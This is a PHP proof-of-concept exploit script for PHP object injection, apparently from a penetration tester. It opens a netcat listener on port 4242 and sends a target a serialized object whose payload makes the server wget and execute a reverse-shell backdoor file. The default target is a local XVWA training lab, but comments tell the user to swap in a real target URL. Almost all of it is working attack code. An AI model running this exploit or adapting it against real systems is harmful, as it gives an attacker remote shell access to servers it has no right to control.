<?php /* PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com A simple PoC to exploit PHP Object Injections flaws and gain remote shell access. Shouts to @jstnkndy @yappare for the assist! NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured */ print "==============================================================================\r\n"; print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n"; print "==============================================================================\r\n"; print "[+] Generating serialized payload...[OK]\r\n"; print "[+] Launching reverse listener...[OK]\r\n"; system('gnome-terminal -x sh -c \'nc -lvvp 4242\''); class PHPObjectInjection { // CHANGE URL/FILENAME TO MATCH YOUR SETUP public $inject = "system('wget -O phpobjbackdoor.php && php phpobjbackdoor.php');"; } $url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER $url = $url . urlencode(serialize(new PHPObjectInjection)); print "[+] Sending exploit...[OK]\r\n"; print "[+] Dropping down to interactive shell...[OK]\r\n"; print "==============================================================================\r\n"; $response = file_get_contents("$url"); ?>